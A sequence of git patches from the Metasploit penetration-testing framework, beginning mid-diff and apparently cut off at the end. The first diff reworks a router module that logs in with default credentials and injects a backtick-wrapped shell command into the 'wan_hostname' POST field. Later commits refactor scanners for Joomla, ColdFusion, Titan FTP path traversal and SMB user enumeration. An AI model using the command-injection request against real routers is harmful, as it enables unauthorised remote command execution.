OptString.new('PASSWORD',[ false, 'Password to login with', 'password']), OptString.new('CMD', [ true, 'The command to execute', 'ping 127.0.0.1']), OptString.new('NETMASK', [ false, 'LAN Netmask of the router', '255.255.255.0']), OptAddress.new('LANIP', [ false, 'LAN IP address of the router - CHANGE THIS', '1.1.1.1']), OptString.new('ROUTER_NAME', [ false, 'Name of the router', 'cisco']), OptString.new('WAN_DOMAIN', [ false, 'WAN Domain Name', 'test']), - OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500']), + OptString.new('WAN_MTU', [ false, 'WAN MTU', '1500']) ], self.class) end @@ -66,7 +66,7 @@ def run routername = datastore['ROUTER_NAME'] wandomain = datastore['WAN_DOMAIN'] wanmtu = datastore['WAN_MTU'] - + if datastore['LANIP'] !~ /1.1.1.1/ #there is a configuration from the user so we use LANIP for the router configuration ip = datastore['LANIP'].split('.') @@ -74,9 +74,8 @@ def run #no configuration from user so we use RHOST for the router configuration ip = rhost.split('.') end - - # not sure if this is a good way for blank passwords: - if datastore['PASSWORD'] == "<BLANK>" + + if datastore['PASSWORD'].nil? pass = "" else pass = datastore['PASSWORD'] @@ -84,108 +83,120 @@ def run print_status("Trying to login with #{user} / #{pass}") - begin - res = send_request_cgi({ - 'uri' => uri, - 'method' => 'GET', - 'basic_auth' => "#{user}:#{pass}" - }) - - unless (res.kind_of? Rex::Proto::Http::Response) - vprint_error("#{rhost} not responding") - end - - return :abort if (res.code == 404) - - if [200, 301, 302].include?(res.code) - print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'") - else - print_error("NO SUCCESSFUL LOGIN POSSIBLE. '#{user}' : '#{pass}'") - return :abort - end - - rescue ::Rex::ConnectionError - vprint_error("#{rhost} - Failed to connect to the web server") - return :abort - end - - print_status("Sending remote command: " + datastore['CMD']) + begin + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'GET', + 'basic_auth' => "#{user}:#{pass}" + }) + + unless (res.kind_of? Rex::Proto::Http::Response) + vprint_error("#{rhost} not responding") + return :abort + end + + if (res.code == 404) + print_error("Not Found page returned") + return :abort + end + + if [200, 301, 302].include?(res.code) + print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'") + else + print_error("NO SUCCESSFUL LOGIN POSSIBLE. '#{user}' : '#{pass}'") + return :abort + end + + rescue ::Rex::ConnectionError + vprint_error("#{rhost} - Failed to connect to the web server") + return :abort + end - # cmd = Rex::Text.uri_encode(datastore['CMD']) cmd = datastore['CMD'] + print_status("Sending remote command: " + cmd) + + #cmd = Rex::Text.uri_encode(datastore['CMD']) #original Post Request: -# data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1" + #data_cmd = "submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcp&daylight_time=1&" + #data_cmd << "lan_ipaddr=4&wait_time=0&need_reboot=0&ui_language=de&wan_proto=dhcp&router_name=#{routername}&" + #data_cmd << "wan_hostname=`#{cmd}`&wan_domain=#{wandomain}&mtu_enable=1&wan_mtu=#{wanmtu}&lan_ipaddr_0=#{ip[0]}&" + #data_cmd << "lan_ipaddr_1=#{ip[1]}&lan_ipaddr_2=#{ip[2]}&lan_ipaddr_3=#{ip[3]}&lan_netmask=#{netmask}&" + #data_cmd << "lan_proto=dhcp&dhcp_check=&dhcp_start=100&dhcp_num=50&dhcp_lease=0&wan_dns=4&wan_dns0_0=0&" + #data_cmd << "wan_dns0_1=0&wan_dns0_2=0&wan_dns0_3=0&wan_dns1_0=0&wan_dns1_1=0&wan_dns1_2=0&wan_dns1_3=0&" + #data_cmd << "wan_dns2_0=0&wan_dns2_1=0&wan_dns2_2=0&wan_dns2_3=0&wan_wins=4&wan_wins_0=0&wan_wins_1=0&" + #data_cmd << "wan_wins_2=0&wan_wins_3=0&time_zone=-08+1+1&_daylight_time=1" - if datastore['VERBOSE'] == true - print_line("using the following target URL: \n#{uri}") - end + vprint_status("using the following target URL: #{uri}") begin - res = send_request_cgi( - { - 'uri' => uri, - 'method' => 'POST', - 'basic_auth' => "#{pass}:#{pass}", - #'data' => data_cmd, - - 'vars_post' => - { - 'submit_button' => "index", - 'change_action' => "1", - 'submit_type' => "1", - 'action' => "Apply", - 'now_proto' => "dhcp", - 'daylight_time' => "1", - 'lan_ipaddr' => "4", - 'wait_time' => "0", - 'need_reboot' => "0", - 'ui_language' => "de", - 'wan_proto' => "dhcp", - 'router_name' => "#{routername}", - 'wan_hostname' => "`#{cmd}`", - 'wan_domain' => "#{wandomain}", - 'mtu_enable' => "1", - 'wan_mtu' => "#{wanmtu}", - 'lan_ipaddr_0' => "#{ip[0]}", - 'lan_ipaddr_1' => "#{ip[1]}", - 'lan_ipaddr_2' => "#{ip[2]}", - 'lan_ipaddr_3' => "#{ip[3]}", - 'lan_netmask' => "#{netmask}", - 'lan_proto' => "dhcp", - 'dhcp_check' => "1", - 'dhcp_start' => "100", - 'dhcp_num' => "50", - 'dhcp_lease' => "0", - 'wan_dns' => "4", - 'wan_dns0_0' => "0", - 'wan_dns0_1' => "0", - 'wan_dns0_2' => "0", - 'wan_dns0_3' => "0", - 'wan_dns1_0' => "0", - 'wan_dns1_1' => "0", - 'wan_dns1_2' => "0", - 'wan_dns1_3' => "0", - 'wan_dns2_0' => "0", - 'wan_dns2_1' => "0", - 'wan_dns2_2' => "0", - 'wan_dns2_3' => "0", - 'wan_wins' => "4", - 'wan_wins_0' => "0", - 'wan_wins_1' => "0", - 'wan_wins_2' => "0", - 'wan_wins_3' => "0", - 'time_zone' => "-08+1+1", - '_daylight_time' => '1' - }, - }) - rescue ::Rex::ConnectionError - vprint_error("#{rhost} - Failed to connect to the web server") - return :abort - end - print_line("") + res = send_request_cgi({ + 'uri' => uri, + 'method' => 'POST', + 'basic_auth' => "#{pass}:#{pass}", + #'data' => data_cmd, + + 'vars_post' => { + 'submit_button' => "index", + 'change_action' => "1", + 'submit_type' => "1", + 'action' => "Apply", + 'now_proto' => "dhcp", + 'daylight_time' => "1", + 'lan_ipaddr' => "4", + 'wait_time' => "0", + 'need_reboot' => "0", + 'ui_language' => "de", + 'wan_proto' => "dhcp", + 'router_name' => "#{routername}", + 'wan_hostname' => "`#{cmd}`", + 'wan_domain' => "#{wandomain}", + 'mtu_enable' => "1", + 'wan_mtu' => "#{wanmtu}", + 'lan_ipaddr_0' => "#{ip[0]}", + 'lan_ipaddr_1' => "#{ip[1]}", + 'lan_ipaddr_2' => "#{ip[2]}", + 'lan_ipaddr_3' => "#{ip[3]}", + 'lan_netmask' => "#{netmask}", + 'lan_proto' => "dhcp", + 'dhcp_check' => "1", + 'dhcp_start' => "100", + 'dhcp_num' => "50", + 'dhcp_lease' => "0", + 'wan_dns' => "4", + 'wan_dns0_0' => "0", + 'wan_dns0_1' => "0", + 'wan_dns0_2' => "0", + 'wan_dns0_3' => "0", + 'wan_dns1_0' => "0", + 'wan_dns1_1' => "0", + 'wan_dns1_2' => "0", + 'wan_dns1_3' => "0", + 'wan_dns2_0' => "0", + 'wan_dns2_1' => "0", + 'wan_dns2_2' => "0", + 'wan_dns2_3' => "0", + 'wan_wins' => "4", + 'wan_wins_0' => "0", + 'wan_wins_1' => "0", + 'wan_wins_2' => "0", + 'wan_wins_3' => "0", + 'time_zone' => "-08+1+1", + '_daylight_time' => '1' + } + }) + rescue ::Rex::ConnectionError + vprint_error("#{rhost} - Failed to connect to the web server") + return :abort + end + + if res and res.code == 200 + print_status("Blind Exploitation - Response expected") + else + print_error("Blind Exploitation - Response don't expected") + end print_status("Blind Exploitation - wait around 10 seconds until the configuration gets applied and your command gets executed") - print_status("Blind Exploitation - unknown Exploitation state\n") + print_status("Blind Exploitation - unknown Exploitation state") end end From 3faf4b3aca2e87a69c8e24db669e4832e7727261 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Thu, 24 Jan 2013 18:13:30 +0100 Subject: [PATCH 149/421] adding sinn3r as author --- modules/exploits/windows/local/payload_inject.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index 38eab33c686d..0e748cb6072b 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb @@ -23,7 +23,8 @@ def initialize(info={}) 'License' => MSF_LICENSE, 'Author' => [ - 'Carlos Perez <carlos_perez[at]darkoperator.com>' + 'Carlos Perez <carlos_perez[at]darkoperator.com>', + 'sinn3r' ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], From 9aaca2eae9f7bf9c0fe9818bd5cea7b32dae966c Mon Sep 17 00:00:00 2001 From: Tasos Laskos <Tasos_Laskos@rapid7.com> Date: Thu, 24 Jan 2013 22:07:17 +0200 Subject: [PATCH 150/421] Auxiliary::Web::HTTP: updated exception handling [FIXRM #7724] Updated #run and #_requestto rescue and elog all exception. --- lib/msf/core/auxiliary/web/http.rb | 16 +++++++++++++--- 1 file changed, 13 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index a26111355676..0a59187c02f2 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -120,10 +120,15 @@ def run tl = [] loop do - # Spawn threads for each host while tl.size <= (opts[:max_threads] || 5) && !@queue.empty? && (req = @queue.pop) tl << framework.threads.spawn( "#{self.class.name} - #{req})", false, req ) do |request| - request.handle_response request( request.url, request.opts ) + # Keep callback failures isolated. + begin + request.handle_response request( request.url, request.opts ) + rescue => e + elog e.to_s + e.backtrace.each { |l| elog l } + end end end @@ -291,7 +296,12 @@ def _request( url, opts = {} ) Response.from_rex_response c.send_recv( c.request_cgi( opts ), timeout ) rescue ::Timeout::Error Response.timed_out - rescue ::Errno::EPIPE, ::Errno::ECONNRESET, Rex::ConnectionTimeout + #rescue ::Errno::EPIPE, ::Errno::ECONNRESET, Rex::ConnectionTimeout + # This is bad but we can't anticipate the gazilion different types of network + # i/o errors between Rex and Errno. + rescue => e + elog e.to_s + e.backtrace.each { |l| elog l } Response.empty end From af3a1db4c16122c1ffad748b637d0f28d0752352 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 24 Jan 2013 14:16:01 -0600 Subject: [PATCH 151/421] Make better use of ruby regex --- modules/auxiliary/scanner/http/cold_fusion_version.rb | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/scanner/http/cold_fusion_version.rb b/modules/auxiliary/scanner/http/cold_fusion_version.rb index 1f7169e41587..64bb92f12aaf 100644 --- a/modules/auxiliary/scanner/http/cold_fusion_version.rb +++ b/modules/auxiliary/scanner/http/cold_fusion_version.rb @@ -39,8 +39,7 @@ def fingerprint(response) return nil if response.body.length < 100 title = "Not Found" - response.body.gsub!(/[\r\n]/, '') - if(response.body =~ /<title.*\/?>(.+)<\/title\/?>/i) + if(response.body =~ /<title.*\/?>(.+)<\/title\/?>/im) title = $1 title.gsub!(/\s/, '') end @@ -51,11 +50,11 @@ def fingerprint(response) if(response.body =~ />\s*Version:\s*(.*)<\/strong\><br\s\//) v = $1 out = (v =~ /^6/) ? "Adobe ColdFusion MX6 #{v}" : "Adobe ColdFusion MX7 #{v}" - elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright 1995-2012 Adobe/ and response.body =~ /Administrator requires a browser that supports frames/ ) + elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright 1995\-2012 Adobe/ and response.body =~ /Administrator requires a browser that supports frames/ ) out = "Adobe ColdFusion MX7" - elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2006 Adobe/) + elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2006 Adobe/) out = "Adobe ColdFusion 8" - elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or + elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2010 Adobe/ or response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2009 Adobe Systems\, Inc\. All rights reserved/) out = "Adobe ColdFusion 9" elsif(response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/) @@ -79,7 +78,7 @@ def run_host(ip) res = send_request_cgi({ 'uri' => url, 'method' => 'GET', - }, 10) + }) return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') From fbbac2bd5161e47041414ebeee046be27a499e34 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Thu, 24 Jan 2013 21:37:04 +0100 Subject: [PATCH 152/421] make module msftidy compliant --- modules/post/multi/manage/sudo.rb | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/modules/post/multi/manage/sudo.rb b/modules/post/multi/manage/sudo.rb index 8b7b2f672f00..41155587d1ad 100644 --- a/modules/post/multi/manage/sudo.rb +++ b/modules/post/multi/manage/sudo.rb @@ -30,9 +30,11 @@ def initialize(info={}) versions from 2008 and later which support -A. }, 'License' => MSF_LICENSE, - 'Author' => [ 'todb <todb[at]metasploit.com>', - 'Ryan Baxendale <rbaxendale[at]gmail.com>' #added password option - ], + 'Author' => + [ + 'todb <todb[at]metasploit.com>', + 'Ryan Baxendale <rbaxendale[at]gmail.com>' #added password option + ], 'Platform' => [ 'linux','unix','osx','solaris','aix' ], 'References' => [ @@ -66,7 +68,7 @@ def run def get_root if datastore['PASSWORD'] password = datastore['PASSWORD'] - else + else password = session.exploit_datastore['PASSWORD'] end From 15253f23bf033156289bbe1d2bf811a01d6fa316 Mon Sep 17 00:00:00 2001 From: Brandon McCann <mccann.brandon@gmail.com> Date: Thu, 24 Jan 2013 15:29:35 -0600 Subject: [PATCH 153/421] added RHOSTS funct --- .../ftp/titanftp_xcrc_traversal.rb | 12 +++++++++--- 1 file changed, 9 insertions(+), 3 deletions(-) rename modules/auxiliary/{admin => scanner}/ftp/titanftp_xcrc_traversal.rb (92%) diff --git a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb similarity index 92% rename from modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb rename to modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb index 476ccc65f2bf..e28eaa05620b 100644 --- a/modules/auxiliary/admin/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb @@ -11,6 +11,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner def proto 'ftp' @@ -28,7 +29,11 @@ def initialize Although the daemon runs with SYSTEM privileges, access is limited to files that reside on the same drive as the FTP server's root directory. }, - 'Author' => 'jduck', + 'Author' => + [ + 'jduck', + 'Brandon McCann @zeknox <bmccann[at]accuvant.com>', + ], 'License' => MSF_LICENSE, 'References' => [ @@ -47,7 +52,7 @@ def initialize end - def run + def run_host(ip) connect_login @@ -55,7 +60,8 @@ def run res = send_cmd( ['XCRC', path, "0", "9999999999"], true ) if not (res =~ /501 Syntax error in parameters or arguments\. EndPos of 9999999999 is larger than file size (.*)\./) - raise RuntimeError, "Unable to obtain file size! File probably doesn't exist." + print_error("Unable to obtain file size! File probably doesn't exist.") + return end file_size = $1.to_i From 16390e31c60a2c40151995f3e09b1c4d5de63c04 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Thu, 24 Jan 2013 15:48:04 -0600 Subject: [PATCH 154/421] Attempt to make travis useful again Lowers the history depth from the default of 100. --- .travis.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.travis.yml b/.travis.yml index 6411d11c2256..6b74b25154b0 100644 --- a/.travis.yml +++ b/.travis.yml @@ -6,3 +6,5 @@ rvm: notifications: irc: "irc.freenode.org#msfnotify" +git: + depth: 1 From dd1ce34ecc202d865f724984c7bb55f6ba17dbaa Mon Sep 17 00:00:00 2001 From: f8lerror <f8lerror+git@gmail.com> Date: Thu, 24 Jan 2013 17:04:22 -0500 Subject: [PATCH 155/421] Made recommended changes removed short timeout added returns and other small changes --- .../auxiliary/scanner/http/joomla_vulnscan.rb | 49 ++++++++++--------- 1 file changed, 27 insertions(+), 22 deletions(-) diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb index 1c465719f1a3..2ad9d2f040d9 100755 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb @@ -23,7 +23,7 @@ def initialize 'Description' => %q{ This module scans a Joomla install for information, plugins and potential vulnerabilites. }, - 'Author' => [ 'f8lerror' ], + 'Author' => [ 'newpid0' ], 'License' => MSF_LICENSE ) register_options( @@ -101,22 +101,23 @@ def run_host(ip) 'language/en-GB/en-GB.ini','htaccess.txt', 'language/en-GB/en-GB.com_media.ini'] iapps = ['robots.txt','administrator/index.php','admin/','index.php/using-joomla/extensions/components/users-component/registration-form', 'index.php/component/users/?view=registration','htaccess.txt'] + vprint_status("#{peer} - Checking Joomla version") apps.each do |app| app_status = check_app(tpath, app, ip) return if app_status == :abort break if app_status end - vprint_status("#{peer} - Checking host for interesting pages") + vprint_status("#{peer} - Checking for interesting pages") iapps.each do |iapp| scan_pages(tpath,iapp,ip) end if datastore['ENUMERATE'] - vprint_status("#{peer} - Checking host for interesting plugins") + vprint_status("#{peer} - Checking for interesting plugins") bres = send_request_cgi({ 'uri' => tpath, 'method' => 'GET', }, 5) - return false if not bres or not bres.body or not bres.code + return if not bres or not bres.body or not bres.code bres.body.gsub!(/[\r|\n]/, ' ') File.open(datastore['PLUGINS'], 'rb').each_line do |bapp| papp = bapp.chomp @@ -129,10 +130,9 @@ def check_app(tpath, app, ip) res = send_request_cgi({ 'uri' => "#{tpath}" << app, 'method' => 'GET', - }, 5) + }) return :abort if res.nil? - return false if not res or not res.body or not res.code - vprint_status("#{peer} - Checking host for version information") + return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') os = osfingerprint(res) if (res.code == 200) @@ -151,7 +151,7 @@ def check_app(tpath, app, ip) :ntype => 'Joomla Version', :data => out ) - return :next_app + return true end elsif(res.code == 403) if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/) @@ -163,25 +163,26 @@ def check_app(tpath, app, ip) else vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}") end - + else + return end rescue OpenSSL::SSL::SSLError vprint_error("#{peer} - SSL error") - return :abort + return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError vprint_error("#{peer} - Unable to Connect") - return :abort + return rescue ::Timeout::Error, ::Errno::EPIPE vprint_error("#{peer} - Timeout error") - return :abort + return end def scan_pages(tpath, iapp, ip) res = send_request_cgi({ 'uri' => "#{tpath}" << iapp, 'method' => 'GET', - }, 5) - return false if not res or not res.body or not res.code + }) + return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') if (res.code == 200) if(res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/) @@ -213,23 +214,25 @@ def scan_pages(tpath, iapp, ip) else vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}") end + else + return end rescue OpenSSL::SSL::SSLError vprint_error("#{peer} - SSL error") - return :abort + return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError vprint_error("#{peer} - Unable to Connect") - return :abort + return rescue ::Timeout::Error, ::Errno::EPIPE vprint_error("#{peer} - Timeout error") - return :abort + return end def plugin_search(tpath, papp, ip, bres) res = send_request_cgi({ 'uri' => "#{tpath}" << papp, 'method' => 'GET', - }, 5) + }) return if not res or not res.body or not res.code res.body.gsub!(/[\r|\n]/, ' ') osize = bres.body.size @@ -279,18 +282,20 @@ def plugin_search(tpath, papp, ip, bres) vprint_status("#{ip} requires a SSL client certificate") else vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}") - end + end + else + return end rescue OpenSSL::SSL::SSLError vprint_error("#{peer} - SSL error") - return :abort + return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError vprint_error("#{peer} - Unable to Connect") - return :abort + return rescue ::Timeout::Error, ::Errno::EPIPE vprint_error("#{peer} - Timeout error") - return :abort + return end From 27aae87c1884740bbbb391fef9fc8960bf6652d2 Mon Sep 17 00:00:00 2001 From: Rob Fuller <jd.mubix@gmail.com> Date: Thu, 24 Jan 2013 22:06:51 -0500 Subject: [PATCH 156/421] Stop aggravating default show screenshot A better fix would have it detect default browsers as being text only like lynx. But this has got to go one way or another. Loosing shell because I forgot to do -v false is wall punch worthy --- .../post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb index 37386cad6639..6c4bd90f17f8 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb @@ -129,7 +129,7 @@ def cmd_uictl(*args) def cmd_screenshot( *args ) path = Rex::Text.rand_text_alpha(8) + ".jpeg" quality = 50 - view = true + view = false screenshot_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help Banner." ], From a9821fce290c5311a3e8b74b34d6df7044cff02c Mon Sep 17 00:00:00 2001 From: Rob Fuller <jd.mubix@gmail.com> Date: Fri, 25 Jan 2013 02:08:30 -0500 Subject: [PATCH 157/421] add action option for domain user enum --- .../auxiliary/scanner/smb/smb_lookupsid.rb | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index 8ffe83a4bbb1..44fdf478d0b3 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -27,14 +27,21 @@ def initialize 'Description' => 'Determine what local users exist via brute force SID lookups', 'Author' => 'hdm', 'License' => MSF_LICENSE, - 'DefaultOptions' => { - 'DCERPC::fake_bind_multi' => false - } + 'DefaultOptions' => + { + 'DCERPC::fake_bind_multi' => false + }, + 'Actions' => + [ + ['LOCAL', { 'Description' => 'Enumerate local accounts' } ], + ['DOMAIN', { 'Description' => 'Enumerate domain accounts' } ] + ], + 'DefaultAction' => 'LOCAL' ) register_options( [ - OptInt.new('MaxRID', [ false, "Maximum RID to check", 4000 ]) + OptInt.new('MaxRID', [ false, "Maximum RID to check", 4000 ]), ], self.class ) @@ -206,6 +213,8 @@ def run_host(ip) :groups => {} } + target_sid = host_sid if action.name =~ /LOCAL/i + target_sid = domain_sid if action.name =~ /DOMAIN/i # Brute force through a common RID range 500.upto(datastore['MaxRID'].to_i) do |rid| @@ -216,7 +225,7 @@ def run_host(ip) NDR.long(1) + NDR.long(rand(0x10000000)) + NDR.long(5) + - smb_pack_sid(host_sid) + + smb_pack_sid(target_side) + NDR.long(rid) + NDR.long(0) + NDR.long(0) + From 976e59954c7d4403bbae176e88e9a3a72073796e Mon Sep 17 00:00:00 2001 From: Rob Fuller <jd.mubix@gmail.com> Date: Fri, 25 Jan 2013 02:14:42 -0500 Subject: [PATCH 158/421] update description --- modules/auxiliary/scanner/smb/smb_lookupsid.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index 44fdf478d0b3..9a7c83fa4c18 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -24,7 +24,9 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'SMB Local User Enumeration (LookupSid)', - 'Description' => 'Determine what local users exist via brute force SID lookups', + 'Description' => 'Determine what users exist via brute force SID lookups. + This module can enumerate both local and domain accounts by setting + ACTION to either LOCAL or DOMAIN', 'Author' => 'hdm', 'License' => MSF_LICENSE, 'DefaultOptions' => From a204f6fd1b493f859478f082cf077bcff6013f30 Mon Sep 17 00:00:00 2001 From: Rob Fuller <jd.mubix@gmail.com> Date: Fri, 25 Jan 2013 02:18:20 -0500 Subject: [PATCH 159/421] variable typo --- modules/auxiliary/scanner/smb/smb_lookupsid.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index 9a7c83fa4c18..28b431e5a8e1 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -227,7 +227,7 @@ def run_host(ip) NDR.long(1) + NDR.long(rand(0x10000000)) + NDR.long(5) + - smb_pack_sid(target_side) + + smb_pack_sid(target_sid) + NDR.long(rid) + NDR.long(0) + NDR.long(0) + From e32bd8d4e0e19493c461f0c71f00798de2ddd901 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 25 Jan 2013 11:44:08 +0100 Subject: [PATCH 160/421] Comma deleted --- modules/auxiliary/scanner/smb/smb_lookupsid.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index 28b431e5a8e1..346f6f04ac5d 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -43,7 +43,7 @@ def initialize register_options( [ - OptInt.new('MaxRID', [ false, "Maximum RID to check", 4000 ]), + OptInt.new('MaxRID', [ false, "Maximum RID to check", 4000 ]) ], self.class ) From a081389f866676aa92450eba257ab62d5928e938 Mon Sep 17 00:00:00 2001 From: Tasos Laskos <Tasos_Laskos@rapid7.com> Date: Tue, 29 Jan 2013 03:08:53 +0200 Subject: [PATCH 161/421] Auxiliary::Web, Exploit::Remote::Web: style updates --- lib/msf/core/auxiliary/web.rb | 6 +++--- lib/msf/core/exploit/web.rb | 3 ++- 2 files changed, 5 insertions(+), 4 deletions(-) diff --git a/lib/msf/core/auxiliary/web.rb b/lib/msf/core/auxiliary/web.rb index a707e6a4ae1b..48428b720c40 100644 --- a/lib/msf/core/auxiliary/web.rb +++ b/lib/msf/core/auxiliary/web.rb @@ -250,9 +250,9 @@ def process_vulnerability( element, proof, opts = {} ) if !(payload = opts[:payload]) if payloads - payload = payloads. - select { |p| element.altered_value.include?( p ) }. - sort_by { |p| p.size }.last + payload = payloads.select { |p| + element.altered_value.include?( p ) + }.sort_by { |p| p.size }.last end end diff --git a/lib/msf/core/exploit/web.rb b/lib/msf/core/exploit/web.rb index df77fa4c366d..6abef6977360 100644 --- a/lib/msf/core/exploit/web.rb +++ b/lib/msf/core/exploit/web.rb @@ -75,7 +75,8 @@ def check def exploit print_status "Sending HTTP request for #{path}" - if res = perform_request + res = perform_request + if res print_status "The server responded with HTTP status code #{res.code}." else print_status 'The server did not respond to our request.' From 2965fa480e0606d620eb5ca1db8ec624c64edbda Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Fri, 25 Jan 2013 05:41:28 -0600 Subject: [PATCH 162/421] Some errant spaces --- lib/msf/core/exploit/web.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/exploit/web.rb b/lib/msf/core/exploit/web.rb index 6abef6977360..dcec407024b9 100644 --- a/lib/msf/core/exploit/web.rb +++ b/lib/msf/core/exploit/web.rb @@ -78,11 +78,11 @@ def exploit res = perform_request if res print_status "The server responded with HTTP status code #{res.code}." - else - print_status 'The server did not respond to our request.' + else + print_status 'The server did not respond to our request.' end handler - end + end def tries 1 From fc3d87ed4cdeadd1e43c94d6a743e1a1f1c3ded2 Mon Sep 17 00:00:00 2001 From: Brandon McCann <mccann.brandon@gmail.com> Date: Fri, 25 Jan 2013 10:43:43 -0600 Subject: [PATCH 163/421] added ms12-020 checker --- 